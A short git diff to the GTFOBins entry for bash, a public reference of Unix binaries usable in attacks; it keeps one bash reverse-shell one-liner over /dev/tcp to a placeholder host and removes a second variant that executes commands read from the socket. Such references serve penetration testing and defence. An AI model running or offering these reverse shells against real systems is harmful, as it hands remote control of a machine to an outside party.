diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 0084760..da1b81d 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -38,8 +38,4 @@ functions: RHOST=10.0.0.1 RPORT=8000 bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 - - code: | - RHOST=10.0.0.1 - RPORT=8000 - exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT; while read line 0<&5; do $line 2>&5 >&5; done ---